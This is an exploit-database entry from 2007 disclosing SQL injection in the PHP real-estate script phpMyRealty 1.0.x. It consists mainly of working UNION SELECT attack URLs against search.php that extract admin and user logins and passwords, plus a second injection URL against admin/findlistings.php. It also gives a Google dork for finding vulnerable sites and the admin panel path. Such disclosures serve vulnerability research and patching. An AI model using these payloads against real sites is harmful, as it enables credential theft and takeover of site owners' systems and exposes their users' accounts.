PHPMyRealty 1.0.x - 'search.php' SQL Injection

EDB-ID:

4750

Author:

Koller

Type:

webapps

Platform:

PHP

Published:

2007-12-18

# xaker.name & grabberz.com
#
#    .__                                          __.   
#    NN)    NNNN   JNNN` NNNN.   NNN NNNNNNNNNNN  NN)   
#    NN)    `NNN).NNNF  .NNNNN  (NN) """4NNN"""`  NN)   
#    NN)     (NNNNNN`   (NNNNN) NNN     (NNN      NN)   
#    NN)      4NNNN`    NNN(NNN.NNF     NNN)      NN)   
#    NN)     JNNNNL    (NN) NNNNNN)    (NNN       NN)   
#    NN)    JNNNNNN)   JNN` `NNNNN     JNNF       NN)   
#    NN)  .NNNF (NNN.  NNN   4NNN)     NNN)       NN)   
#    NN) JNNN`   NNNN (NN)    NNN`    (NNN        NN)   
#    NN)                                          NN)  
#    .__           http://xaker.name              __.
#
#
# script name      : phpMyRealty 1.0.x
# GoogLe Dork      : Powered by phpMyRealty
# Script demo      : www.phpmyrealty.com/demo/index.php
# The price        : $99.95
# Risk             : Average
# Found By         : Koller
# Thanks           : | robo9 | rijy | Concord | Helkern | Constantine | -St1ff- | .dot | @$_terr_X | b3 |
# Vulnerable files : search.php, findlistings.php

# Vuln : www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_admins
#        www.victim.com/search.php?type=-1+union+select+concat_ws(char(58),login,password)+from+pmr_users
#
# Admin panel: www.victim.com/admin/index.php
#
# Addon :) - sql-injection in findlistings.php
# www.victim.com/admin/findlistings.php?listing_updated=YES&listing_updated_days=1)+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/* 

# Contact: K0ller (at) hotmail (dot) CoM

# milw0rm.com [2007-12-18]